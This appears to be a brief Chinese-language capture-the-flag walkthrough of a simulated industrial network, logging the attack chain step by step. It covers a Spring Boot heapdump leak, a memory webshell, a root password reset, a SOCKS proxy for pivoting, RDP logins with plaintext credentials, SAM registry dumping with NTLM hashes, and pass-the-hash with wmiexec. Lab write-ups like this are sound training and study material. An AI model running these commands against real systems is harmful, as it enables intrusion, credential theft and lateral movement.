fscan
springboot,有 heapdump。在/actuator/heapdump
中,用 Jdump 扫一下。
找个工具往里写个内存马就能用了。用 antsword 连接。
echo "root:libr" | chpasswd
可以用 ssh 连上,传入 fscan。
内网:172.22.0.0/16
172.22.17.6 172.22.17.213(外部)
上传 ew,搭建代理。
./ew -s ssocksd -l 8888
用 proxifier,打开 rdp,锅炉开。
flag{bcd080d5-2cf1-4095-ac15-fa4bef9ca1c0}
找到桌面上的文件,还有C盘里的某个加密程序。打开 dnSpy 分析主要逻辑。
用 aes 加密的数据,iv 存在文件的前几位。
给了附件,附件中有 aeskey,和一个 privkey。简单搓两个脚本。
from Crypto.PublicKey import RSA from Crypto.Cipher import PKCS1_v1_5,AES from base64 import b64decode,b64encode key = RSA.import_key(open("key").read()) cipher = PKCS1_v1_5.new(key) key = cipher.decrypt(b64decode("lFmBs4qEhrqJJDIZ6PXvOyckwF/sqPUXzMM/IzLM/MHu9UhAB3rW/XBBoVxRmmASQEKrmFZLxliXq789vTX5AYNFcvKlwF6+Y7vkeKMOANMczPWT8UU5UcGi6PQLsgkP3m+Q26ZD9vKRkVM5964hJLVzogAUHoyC8bUAwDoNc7g="), sentinel=b'') # print(b64encode(r).decode()) file = open("ScadaDB.sql.locky","rb").read() iv = file[:16] cipher = AES.new(key,AES.MODE_CBC,iv) file = file[16:] file = cipher.decrypt(file) open("ScadaDB.sql","wb").write(file)
,找flag。
172.22.17.6的文件下载可以下载相关信息。
发现SCADA 工程师的账号都能登录…
chenhua chenhua@0813 zhaoli zhaoli@0821
proxychains4 xfreerdp /u:chenhua /p:chenhua@0813 /v:172.22.17.6 /drive:share1,./tmp
可以直接转储 SAM
cd C:\ mkdir Temp cd C:\Temp reg save hklm\sam c:\Temp\sam reg save hklm\system c:\Temp\system
python secretsdump.py -sam sam -system system LOCAL
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a2fa2853651307ab9936cc95c0e0acf5::: chentao:1000:aad3b435b51404eeaad3b435b51404ee:47466010c82da0b75328192959da3658::: zhaoli:1001:aad3b435b51404eeaad3b435b51404ee:2b83822caab67ef07b614d05fd72e215::: wangning:1002:aad3b435b51404eeaad3b435b51404ee:3c52d89c176321511ec686d6c05770e3::: zhangling:1003:aad3b435b51404eeaad3b435b51404ee:8349a4c5dd1bdcbc5a14333dd13d9f81::: zhangying:1004:aad3b435b51404eeaad3b435b51404ee:8497fa5480a163cb7817f23a8525be7d::: lilong:1005:aad3b435b51404eeaad3b435b51404ee:c3612c48cf829d1149f7a4e3ef4acb8a::: liyumei:1006:aad3b435b51404eeaad3b435b51404ee:63ddcde0fa219c75e48e2cba6ea8c471::: wangzhiqiang:1007:aad3b435b51404eeaad3b435b51404ee:5a661f54da156dc93a5b546ea143ea07::: zhouyong:1008:aad3b435b51404eeaad3b435b51404ee:5d49bf647380720b9f6a15dbc3ffe432:::
pass hash可以登录。
proxychains4 python wmiexec.py [email protected] -hashes :f82292b7ac79b05d5b0e3d302bd0d279 -codec gbk